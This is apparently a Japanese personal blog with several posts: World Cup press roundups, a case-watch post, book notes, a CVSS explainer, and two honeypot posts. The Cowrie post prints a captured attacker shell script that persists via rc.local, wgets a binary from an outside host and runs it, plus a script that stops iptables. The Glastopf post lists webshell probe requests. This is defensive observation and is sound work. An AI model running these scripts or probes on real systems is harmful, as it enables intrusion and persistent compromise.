日本代表vsセネガル代表の試合を海外メディアはどう報道しているか
遅くなりましたが、一昨日のセネガル戦について書きます。
引き分けに終わってしまいましたが、個人的には勝たなければいけない試合だったと感じています。
失点に関しても、1点目は複数のミスが重なって失点してしまいましたし、シュートに関しても2点くらい日本代表の決定的なシーンがあったので、勝ちきってほしい印象でした。
この試合について海外ではどう報道されているかコロンビア戦に続きまとめたいと思います。
Agencia EFE
Japan and Senegal tie 2-2 in beautiful match, keep knockout round hopes alive (日本とセネガルは美しい試合の中2−2の引き分け、最終ゲームに望みをかける)
Agencia EFEは日本がより支配的で多くのチャンスを得たと評価しています。
The Japanese side was more dominant and had more chances in their second match of the tournament, but the Senegalese gave a lesson in effectiveness.
Agencia EFEはセネガルのシセ監督のインタビュー記事も書いています。
この記事の中で、シセ監督がセネガル代表のマネを称賛していて、次のコロンビア戦でも重要な存在になってくると思います。
sky sports
Japan 2-2 Senegal: Keisuke Honda rescues point for Japan (日本 2-2 セネガル: 本田圭佑が日本のために点を奪う)
sky sportsではまず本田さんを称賛しています。
と同時に1点目の日本の失点を川島さんのミスと指摘しています。 たしかにあれは、ミスだよなーと思います。
In a game of goalkeeping errors, Senegal took an early lead when Eiji Kawashima turned Youssouf Sabaly's shot into the body of Sadio Mane for a goal he knew little about after 11 minutes.
sky sportsでは毎試合選手のレーティングを示してくれるので、おもしろいです。
sky sportsでのMoMは綺麗なゴールを決めた乾さんです。 1点目の華麗なゴールと2点目のアシストが大きなポイントになったと評価しています。
Eibar winger Inui was brilliant for Japan and perhaps unlucky not to get a second goal on the night, but grabbing one, plus an assist for the second, was a fine return from a committed performance.
吉田さんも7と高得点ですが、川島さんと香川さんが5と低いです。
たしかに香川さんもあまりチャンスがなかった気がします。。。
The New York Times
Japan and Senegal Control World Cup Fates After Draw (日本とセネガルはドローの後もW杯の運命をコントロール)
The New York Timesでは、試合結果に加え、その後に行われるコロンビア対ポーランドの試合にも触れ、いずれの結果になったとしても、両チームは自力での決勝トーナメントに行ける可能性が残ったと紹介しています。
西野監督が試合前に「5センチ高くしろ、5キロ太れ」と選手たちに冗談を言ったことを紹介し、おもしろいです。
Japan Coach Akira Nishino joked before the game that he had instructed his players to “grow 5 centimeters and gain 5 kilograms” ahead of this clash, a nod to Senegal’s physical advantage in the matchup. The opening minutes proved him prophetic.
REUTERS
Honda salvages 2-2 draw for Japan against Senegal with late strike (本田は遅めのシュートで日本を救う)
ロイターでは本田をかなり評価している様子です。
また、マネさんの悔しそうなコメントを紹介していて、とても興味深いです。
“We’re a bit disappointed... there was a way to win this match,” added Mane, who failed to exert his influence despite scoring. “We started well, we created a lot of opportunities, we were quite dangerous... we now have a decisive match to qualify next week.” (「我々は少々失望している。この試合に勝つことができた。」と得点を決めたにも関わらず影響を発揮できなかったマネ選手は加える。「我々はよくスタートした。多くのチャンスを作った。とても危険だった・・・。来週に向けて決定的な試合がある。」)
全体的に得点を決めた乾さんや本田さんを評価しているようでした。
海外目線で日本のことを知るのは面白いので、今後も引き続き海外メディアの内容はご紹介したいと思います。
ポーランド戦では勝って決勝トーナメント進出を決めて欲しいです!
日本代表vsコロンビア代表の試合を海外メディアはどう報道しているか
昨日のコロンビア戦で日本代表が勝利して、勝ち点3を取ってとても嬉しいです。
代表選手達も最後まで気を抜かず、引き締まっていた試合だったかなと思います。
今日以降、日本のメディアでは様々な評価がされると思いますが、世界のメディアでは日本対コロンビア戦をどう見ているのか気になったので、調べてみました。
Agencia EFE
Agencia EFEはスペインの通信社で、サッカーの報道をよくしているのですが、コロンビア戦も終了後すぐに記事を掲載していました。
Japan puts damper on Colombia's high hopes for World Cup debut with 1-2 win (日本が1-2でコロンビアのW杯の初戦をくじいた。)
記事では、香川さんと大迫さんのゴールが紹介されています。
sky sports
sky sportsはイギリスのスポーツ専門チャンネルですが、こちらでも試合後すぐに取り上げられていました。
Yuya Osako header seals emotional opening win (大迫勇也のヘッドが感動的な勝利を決める)
ここでも大きく大迫のヘッドが取り上げられています。 面白いのが、途中出場したハメス・ロドリゲスのPlayer ratingsが低い値の5になっているのが、特徴的でした。
sky sportsでは、大阪での地震がある中の試合と記載されていて、日本の事情をよく知っているなと感じました。
The New York Times
ニューヨークタイムズはもうご存知ですね。
こちらでも試合後すぐに記事がアップされていました。
Japan’s World Cup Starts With a Wild Win Over Colombia (日本のワールドカップはコロンビアに対する荒々しい勝利で始まる)
ニューヨークタイムズでは時系列で詳しく試合内容を紹介していました。 また、今回の勝利はグループにとっても大きなものとなると評価しています。
REUTERS
ロイターさんも有名ですね。
こちらでも試合後すぐに取り上げられていました。
Japan sink 10-man Colombia in historic win for Asia (日本はアジアにとって歴史的な勝利に向けて10人のコロンビアを下す) 訳むずい。。。
ロイターでは、今回の日本の勝利を歴史的な勝利と高く評価していますが、面白いのはコロンビア代表の監督のコメントを紹介しているところが特徴的でした。
“Without doubt we were expecting something different, we were hoping to start with a victory,” Pekerman said. “It’s unfortunate for the people of Colombia who came here with high hopes. This is obviously going to leave us with a bitter memory.” (間違いなく、私たちは違うことを期待していた。私たちは勝利で始めることを望んでいた。大きな期待を持ってここに来たコロンビアの人々にとっては不運だった。今回の試合は間違いなく私たちに苦い記憶を残すだろう。)
とても悔しそうですね。
今回いろんな海外メディアの試合内容の紹介を見てみましたが、それぞれ意外と個性があっておもしろいので、今後の試合でもチェックしたいと思います。 訳に間違いがございましたら、ご指摘ください。
なんとなくニューヨークタイムズが一番クセが強いです。笑
関連記事です。
Hello, Peppa!という謎のアクセス
何気なくGlastopfのログを見ていると、いつもとは違った変なアクセスがありました。
同じ時刻に同じIPアドレスから6件アクセスが来ているので、何らかのスクリプトで脆弱性がないか探索しているものと推測できます。
アクセス①
POST /wuwu11.php HTTP/1.1 Connection: Close Content-Length: 23 Content-Type: application/x-www-form-urlencoded Host: XXX.XXX.XXX.XXX:80 User-Agent: Mozilla/5.0 h=die('Hello, Peppa!');
アクセス②
POST /xw.php HTTP/1.1 Connection: Close Content-Length: 23 Content-Type: application/x-www-form-urlencoded Host: XXX.XXX.XXX.XXX:80 User-Agent: Mozilla/5.0 h=die('Hello, Peppa!');
アクセス③
POST /xx.php HTTP/1.1 Connection: Close Content-Length: 25 Content-Type: application/x-www-form-urlencoded Host: XXX.XXX.XXX.XXX:80 User-Agent: Mozilla/5.0 axa=die('Hello, Peppa!');
アクセス④
POST /s.php HTTP/1.1 Connection: Close Content-Length: 26 Content-Type: application/x-www-form-urlencoded Host: XXX.XXX.XXX.XXX:80 User-Agent: Mozilla/5.0 leng=die('Hello, Peppa!');
アクセエス⑤
POST /w.php HTTP/1.1 Connection: Close Content-Length: 26 Content-Type: application/x-www-form-urlencoded Host: XXX.XXX.XXX.XXX:80 User-Agent: Mozilla/5.0 leng=die('Hello, Peppa!');
アクセス⑥
POST /sheep.php HTTP/1.1 Connection: Close Content-Length: 22 Content-Type: application/x-www-form-urlencoded Host: XXX.XXX.XXX.XXX:80 User-Agent: Mozilla/5.0 m=die('Hello, Peppa!')
アクセスしている下記6つのファイルをネットで検索してみましたが、これといって有益な情報は出て来ませんでした。。。
Body部分に含まれているキーワードの「Hello, Peppa!」でも調べてみましたが、イギリスの豚のキャラクターしか出てこなかったです。笑
Peppa Pig Full Episodes | LIVE Peppa Pig 2018 #144
かわいい。。。
まだアクセスログもそんなに多くないので、今後このアクセスが増えてくれば、もう少し情報が出てくると思います。
知っている方がいらっしゃいましたら、教えてください。
紀州のドン・ファン野崎幸助の事件をウォッチしていく
先日紀州のドン・ファンの野崎幸助が亡くなって、ファンの一人としてとても悲しいのですが、事件性があるので、この記事ではそれをウォッチしていきたいと思います。
情報源は主にネットニュースです。
随時新しい情報が入れば、更新していきます。
2018/5/24(木)
野崎幸助さん(77)自宅で死亡。 6月上旬あたりから遺体から覚せい剤反応が出たとニュースになる。
急死“ドン・ファン”ビールに覚醒剤混入か|日テレNEWS24
2018/6/7(木)
警察が野崎さんの愛犬の死因調査を開始する。 野崎さんの死因となった覚せい剤の反応が同じく愛犬から検出されるかどうか調査しているとのことだが、まだ結果が出ていない模様。
“紀州のドン・ファン”不審死、愛犬は鑑定できる状態 TBS NEWS
紀州のドン・ファン怪死 愛犬イブから覚せい剤反応か いよいよ殺人事件へ (2/2) 〈週刊朝日〉|AERA dot. (アエラドット)
随時更新します。
【読書メモ】ゲームと仕事の違いは何か『残酷すぎる成功法則』
最近マインクラフトにハマりすぎていて、読書する時間、ブログ書く時間、勉強する時間、プログラミングする時間など僕が生産的と思っている時間が少なくなっているので、ゲームと仕事や勉強などの違いを知りたくて、『残酷すぎる成功法則』を読みました。
- 作者: エリック・バーカー,橘玲,竹中てる実
- 出版社/メーカー: 飛鳥新社
- 発売日: 2017/10/25
- メディア: 単行本(ソフトカバー)
- この商品を含むブログ (4件) を見る
結論から言うと、根本的には違いは無くて、個人の捉え方に違いがあると知ったので、どう捉えたら仕事や勉強などがゲームみたいに夢中になれるかご紹介したいと思います。
この本では上記にあるような僕の疑問に直接的にヒントを与えてくれるところが多々あり、とても参考になりました。
ここで疑問が湧いてくる。厄介なことも多く、挫折感も味わうゲームは学業や仕事と大差ないのに、どうして人はゲームにワクワクし、仕事にはウンザリなのか? エリック・バーカー;橘玲.残酷すぎる成功法則(Kindleの位置No.1685-1687).株式会社飛鳥新社.Kindle版.
ゲームの仕組みを仕事や勉強に適用すれば、人生でも成功できるとこの本では主張しています。
その仕組みとは、「WNGF」という仕組みです。
WNGFとは
WNGFとは、
- 勝てること(Winnable)
- 斬新であること(Novel)
- 目標(Goals)
- フィードバック(Feedback)
の頭文字を取ったものになります。
多くのゲームは上記の4つの要素がうまく仕組まれていて、仕事や勉強はそれらの要素が少ないためにつまらなくなってしまうとのこです。
なので僕が今ハマっているマインクラフトと勉強(現状)を比較してみました。
こんな感じだと思います。
マインクラフトなど様々なゲームは大体勝てるし、斬新で新しい目標がどんどん出現するし、何より成果が見えやすいのに対し、勉強は勝てない(なかなか成果が上がっていると感じられない)ことが多いような気がします。
勉強に関して大事なことは、まずは簡単に勝てるゴールを設定することが大事なんだなあと思いました。
例えば、
- 参考書を買う
- 目次だけ見てみる
- 1問だけ問題を解いてみる
など、可能な限り簡単に勝てるゴールを設定する工夫をすれば、ゲーム性が増すと思います。
また、斬新さに関しても、今はできないことを悲観的に捉えるのではなく、それを新しいステージだと思って、取り組むことが斬新さを向上させることに繋がると思います。
目標に関しては、フィードバックと被るとことがあるのですが、長期的にみてもある程度わかりやすいゴールを設定した方が勉強に夢中になれると思います。 (例えば、資格を取得するなど。)
ということで、上記の表を修正したものがこちらです。
なんとなく、この4つの要素を向上させることで、勉強も楽しく取り組むことができるようになりそうです。
みなさんも頑張りたいけど、なんか後回しにしてしまうようなことがあれば、この4つの要素を取り入れて、楽しく生活していってほしいです。
上記のシートを記入できるようにしたので、よかったら使ってみてください。
ダウンロードはこちらから。
https://drive.google.com/open?id=15m3E0kLnpa66Ng6LzGt_8sO5pvOmFnGH
SSHハニーポットCowrieでダウンロードされたファイルを見てみる
しばらくCowrieを放置していたのですが、かなりアクセスが来ているようで、実際にダウンロードされたファイルもたくさんあったので、どんなファイルがダウンロードされていたかご紹介したいと思います。
Cowrieの場合、攻撃者がSSHでログインして何かしらのファイルをダウンロードした場合、上記の公式ドキュメントのとおりdlディレクトリに格納されます。
早速そこのディレクトリの中を覗いてみようと思います。
-rw-r--r-- 1 cowrie cowrie 59 Jun 10 02:44 07f637a3d34119fc8818d7eb6d7b4aa17891a1bf9cb563df13d6802864b89386 -rw-r--r-- 1 cowrie cowrie 1035157 Jun 1 01:24 0ffa9e646e881568c1f65055917547b04d89a8a2150af45faa66beb2733e7427 -rw-r--r-- 1 cowrie cowrie 2250 May 31 04:10 12a51f899c8fab7c131b4b851cca0c84e95f31aadc86ce1198fae91126304127 -rw-r--r-- 1 cowrie cowrie 3239584 Jun 4 21:38 12d6f7971e5797e060621aa150eda78e814a3a9dab093f6e58d83cd94a71ced1 -rw-r--r-- 1 cowrie cowrie 1223123 Jun 6 14:56 176a317df7b801a5af856e8b351995dacba50f6d4df1281235dce536e63c6251 -rw-r--r-- 1 cowrie cowrie 2267 Jun 6 22:59 36fc374823925e9d1c14bd41e282284111fbd345c8d9755974ea0e568f8ddbee -rw-r--r-- 1 cowrie cowrie 65400 Jun 4 14:35 399851bc221ffe3999f82ff7cd70a150ed92dbaa04c6e0f21bccf176d5dd0ceb -rw-r--r-- 1 cowrie cowrie 7200 Jun 3 18:48 4188692fd507fe4c362ad5aa99b5db01673e88ec8bfe605986ceb1480c2e6c97 -rw-r--r-- 1 cowrie cowrie 2327 Jun 1 02:12 4f75eec50688856480316bb404ba90d33d5de43ded45066b5a3d9b3fb7cc8720 -rw-r--r-- 1 cowrie cowrie 1034309 Jun 1 01:22 5685b086ce12ffede8814e303223a67eca476735dfe4e9e84b751354a5ea0232 -rw-r--r-- 1 cowrie cowrie 1203885 Jun 1 01:23 5c8c41253aa68adeb955e7d1c7b8e084e06537f75eff12c3f3a0f3cb30cb2152 -rw-r--r-- 1 cowrie cowrie 1 Jun 7 17:00 6e340b9cffb37a989ca544e6bb780a2c78901d3fb33738768511a30617afa01d -rw-r--r-- 1 cowrie cowrie 2253 Jun 4 21:37 7f4baf3bc359fe5679b76b2873ee5d3e474f6436bbb2f3027383ac87b9e2b590 -rw-r--r-- 1 cowrie cowrie 1215093 Jun 1 01:23 86fbdd7df9486a17e9c408c7e50635e26402fdf297c9e97f1a5256100401dcc5 -rw-r--r-- 1 cowrie cowrie 1223123 Jun 4 13:11 885fdc6be061dae3a95501f636924c1e7305684a468cd382ed8246e8bf84a5ff -rw-r--r-- 1 cowrie cowrie 1069817 Jun 1 01:22 9c2848962733846bf50b490fd8f6c7ce9ecade2d3f2f530f5ecbba283af87d3a -rw-r--r-- 1 cowrie cowrie 73 Jun 6 14:58 9e5f93361b899d85a00a286bd1ea96b056d102926f96c131fc988739eca18355 -rw-r--r-- 1 cowrie cowrie 1223123 May 31 04:10 beba1a9b20f23f022bd354e5128c463bbe52c3715b406a3aae73e7e33f39518a -rw-r--r-- 1 cowrie cowrie 7432 Jun 1 17:58 d94e3cd7a3575da5b8326298fe93fa7504979640257d3beab511f4257ac47803 -rw-r--r-- 1 cowrie cowrie 1236080 Jun 6 22:59 e651a05c9cb0bde4e8efa635f699ba3e186afd4ae4c42760e3d97ffa01d8c8ca -rw-r--r-- 1 cowrie cowrie 1135000 Jun 4 13:19 f1c8304d393a42b42cde13663089a6bd46713f7abadfe8294efcec7142cb4fbe -rw-r--r-- 1 cowrie cowrie 58 May 31 04:10 f8c28666f2f2beb599dcc62721c41a82f52e63721dd2d5629073033b32a93154 -rw-rw-r-- 1 cowrie cowrie 14 May 29 21:53 .gitignore -rw------- 1 cowrie cowrie 0 Jun 4 21:36 tmp5g1gzD -rw------- 1 cowrie cowrie 0 May 31 04:09 tmp8InVpr -rw------- 1 cowrie cowrie 0 May 31 04:09 tmpi2B1wA
めちゃめちゃファイルがダウンロードされてます。。。笑
fileコマンドでどんなタイプのファイルが来ているか確認してみた結果がこちらです。
$ file * 07f637a3d34119fc8818d7eb6d7b4aa17891a1bf9cb563df13d6802864b89386: ASCII text 0ffa9e646e881568c1f65055917547b04d89a8a2150af45faa66beb2733e7427: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped 12a51f899c8fab7c131b4b851cca0c84e95f31aadc86ce1198fae91126304127: Bourne-Again shell script, ASCII text executable 12d6f7971e5797e060621aa150eda78e814a3a9dab093f6e58d83cd94a71ced1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, BuildID[sha1]=c77cd956ea0e1620a83b6385e1246f0a8c59c270, not stripped 176a317df7b801a5af856e8b351995dacba50f6d4df1281235dce536e63c6251: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped 36fc374823925e9d1c14bd41e282284111fbd345c8d9755974ea0e568f8ddbee: Bourne-Again shell script, ASCII text executable 399851bc221ffe3999f82ff7cd70a150ed92dbaa04c6e0f21bccf176d5dd0ceb: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped 4188692fd507fe4c362ad5aa99b5db01673e88ec8bfe605986ceb1480c2e6c97: Perl script, ASCII text executable 4f75eec50688856480316bb404ba90d33d5de43ded45066b5a3d9b3fb7cc8720: Bourne-Again shell script, ASCII text executable 5685b086ce12ffede8814e303223a67eca476735dfe4e9e84b751354a5ea0232: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped 5c8c41253aa68adeb955e7d1c7b8e084e06537f75eff12c3f3a0f3cb30cb2152: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped 6e340b9cffb37a989ca544e6bb780a2c78901d3fb33738768511a30617afa01d: very short file (no magic) 7f4baf3bc359fe5679b76b2873ee5d3e474f6436bbb2f3027383ac87b9e2b590: Bourne-Again shell script, ASCII text executable 86fbdd7df9486a17e9c408c7e50635e26402fdf297c9e97f1a5256100401dcc5: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped 885fdc6be061dae3a95501f636924c1e7305684a468cd382ed8246e8bf84a5ff: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped 9c2848962733846bf50b490fd8f6c7ce9ecade2d3f2f530f5ecbba283af87d3a: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped 9e5f93361b899d85a00a286bd1ea96b056d102926f96c131fc988739eca18355: ASCII text beba1a9b20f23f022bd354e5128c463bbe52c3715b406a3aae73e7e33f39518a: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped d94e3cd7a3575da5b8326298fe93fa7504979640257d3beab511f4257ac47803: Perl script, ASCII text executable e651a05c9cb0bde4e8efa635f699ba3e186afd4ae4c42760e3d97ffa01d8c8ca: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, BuildID[sha1]=c0c8301fa94c01ee6d79e0d745b7830c77693a97, stripped f1c8304d393a42b42cde13663089a6bd46713f7abadfe8294efcec7142cb4fbe: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped f8c28666f2f2beb599dcc62721c41a82f52e63721dd2d5629073033b32a93154: ASCII text tmp5g1gzD: empty tmp8InVpr: empty tmpi2B1wA: empty
一番多いのが、"ELF 32-bit MSB executable"という標準バイナリ形式のファイルでした。
それ以外でもPerlのスクリプトだったり、普通のシェルスクリプトだったり、いろんな種類のファイルがダウンロードされていました。
今回は手軽に閲覧できるテキスト形式のファイルの中身を2つほどご紹介したいと思います。
ファイル①
こちらのファイルはroot権限でasd5121という実行ファイルを実行して、iptablesをストップするスクリプトになります。
cd /root/ ./asd5121& ./asd5121& /etc/init.d/iptables stop
asd5121はバイナリ形式だったので、どんな動作をするのか確認することはできませんでしたが、iptablesを停止されるのは嫌ですね。
ファイル②
次はシェルスクリプトになります。
こちらもインターネット上からファイルをダウンロードして、そのファイルを実行するような動きになっています。
#Welcome like-minded friends to come to exchange. #We are a group of people who have a dream. # qun:10776622 # 2016-06-14 if [ "sh /etc/Xsny.sh &" = "$(cat /etc/rc.local | grep /etc/Xsny.sh | grep -v grep)" ]; then echo "" else echo "sh /etc/Xsny.sh &" >> /etc/rc.local fi while [ 1 ]; do Centos_sshd_killn=$(ps aux | grep "/tmp/ElccR" | grep -v grep | wc -l) if [[ $Centos_sshd_killn -eq 0 ]]; then if [ ! -f "/tmp/ElccR" ]; then if [ -f "/usr/bin/wget" ]; then cp /usr/bin/wget . chmod +x wget #./wget -P . http://XXX.top/ElccR ./wget -P /tmp/ http://XXX.top/ElccR &> /dev/null chmod 755 /tmp/ElccR rm wget -rf else echo "No wget" fi fi /tmp/ElccR & #./ElccR & elif [[ $Centos_sshd_killn -gt 1 ]]; then for killed in $(ps aux | grep "ElccR" | grep -v grep | awk '{print $2}'); do Centos_sshd_killn=$(($Centos_sshd_killn-1)) if [[ $Centos_sshd_killn -eq 1 ]]; then continue else kill -9 $killed fi done else echo "" fi Centos_ssh_killn=$(ps aux | grep "/tmp/ElccR" | grep -v grep | wc -l) if [[ $Centos_ssh_killn -eq 0 ]]; then if [ ! -f "/tmp/ElccR" ]; then if [ -f "/usr/bin/wget" ]; then cp /usr/bin/wget . chmod +x wget #./wget -P . http://XXX.top/ElccR ./wget -P /tmp/ http://XXX.top/ElccR &> /dev/null chmod 755 /tmp/ElccR rm wget -rf else echo "No wget" fi fi /tmp/ElccR & #./ElccR & elif [[ $Centos_ssh_killn -gt 1 ]]; then for killed in $(ps aux | grep "ElccR" | grep -v grep | awk '{print $2}'); do Centos_ssh_killn=$(($Centos_ssh_killn-1)) if [[ $Centos_ssh_killn -eq 1 ]]; then continue else kill -9 $killed fi done else echo "" fi sleep 600 done
このスクリプトに記載されているURLにアクセスしてみましたが、現在はファイルをダウンロードできないようになっていました。
先頭にあるコメントが面白いですね。
Welcome like-minded friends to come to exchange. We are a group of people who have a dream.
直訳すると「同じ志を持った仲間を歓迎する。我々はある夢を持ったグループです。」って感じですかね。
今後もCowrieのログは観察していこうと思います。
関連記事です。
エンジニアならCVSS(共通脆弱性評価システム )について知っとこ
日々、ハニーポットを運用していて様々な製品の脆弱性を狙った攻撃を観察していますが、その脆弱性を評価するCVSS(共通脆弱性評価システム )について疎かったので、今日はそのCVSSについてご紹介したいと思います。
CVSSとは
そもそもCVSSとは何なのでしょうか。
IPAによると、
共通脆弱性評価システム CVSS ( Common Vulnerability Scoring System) は、情報システムの脆弱性に対するオープンで包括的、汎用的な評価手法の確立と普及を目指し、米国家インフラストラクチャ諮問委員会( NIAC: National Infrastructure Advisory Council )のプロジェクトで 2004年10月に原案が作成されました。
と説明されております。
CVSSは脆弱性に対するオープンで汎用的な指標で、脆弱性を定量的に評価できるのが大きなポイントになります。
CVSSは下記の3つの観点から脆弱性を評価します。
- 基本評価基準(Base Metrics)
- 現状評価基準(Temporal Metrics)
- 環境評価基準(Environmental Metrics)
それぞれの説明はIPAのサイトで詳しく解説されております。
(引用:共通脆弱性評価システムCVSS概説:IPA 独立行政法人 情報処理推進機構)
評価基準の詳細な内容
上記の3つの評価基準にはさらに詳細に区分があり、内容は上記サイトに詳しく記載されていますが、区分ごとに値が決まっています。
その各値を基に脆弱性を定量的に算出することができるという仕組みになっています。
脆弱性の値の算出方法
値の算出方法も上記サイトに記載されていて、下記のとおりとなっています。
- CVSS 基本値 (Base Score)
影響度 = 10.41×( 1 - ( 1 - C )×( 1 - I )×( 1 - A ) ) …式(1)
攻撃容易性 = 20×AV×AC×Au …式(2)
f(影響度) = 0(影響度が0の場合) , 1.176(影響度が0以外の場合) …式(3)
基本値 = ((0.6× 影響度)+(0.4× 攻撃容易性 )-1.5)×f(影響度) …式(4) (小数点第 2 位四捨五入)
- CVSS 現状値 (Temporal Score)
現状値 = 基本値 ×E×RL×RC (小数点第 2 位四捨五入) …式(5)
- CVSS 環境値 (Environmental Score)
環境値 =( 調整後現状値 +(10- 調整後現状値 )×CD)×TD …式(8) (小数点第 2 位四捨五入)
一番やばい値と一番やばくない値について
上記の算出式を基にCVSSの値の一番やばい値(最高値)と一番やばくない値(最低値)を求めてみた結果がこちらです。
計算してみて分かったのですが、CVSS 基本値 (Base Score)、CVSS 現状値 (Temporal Score)、CVSS 環境値 (Environmental Score)のいずれも実際には「9.99・・・」になるので、小数点第2位を四捨五入すると最高値が10、最低値が0になりました。
全体的な値でやばそうとかやばくなさそうとかは分かるのですが、個々の区分を見ると、攻撃の実行容易生や攻撃の可能性(理論上可能だけど、実行は難しいとか)など細かな特性があるので、それぞれの脆弱性情報を見る際に役に立ちそうです。
ちなみに2018年が始まって、現時点で深刻度が危険レベル(7.0〜10.0)の脆弱性は「脆弱性対策情報データベース」によると、822件もあるので、結構やばい脆弱性がたくさんあるようです。
上記のCCSSの各値を理解していると、「脆弱性対策情報データベース」を見ても脆弱性のレベル感が具体的に理解できるようになるので、エンジニアの方はぜひ知っといてほしいです。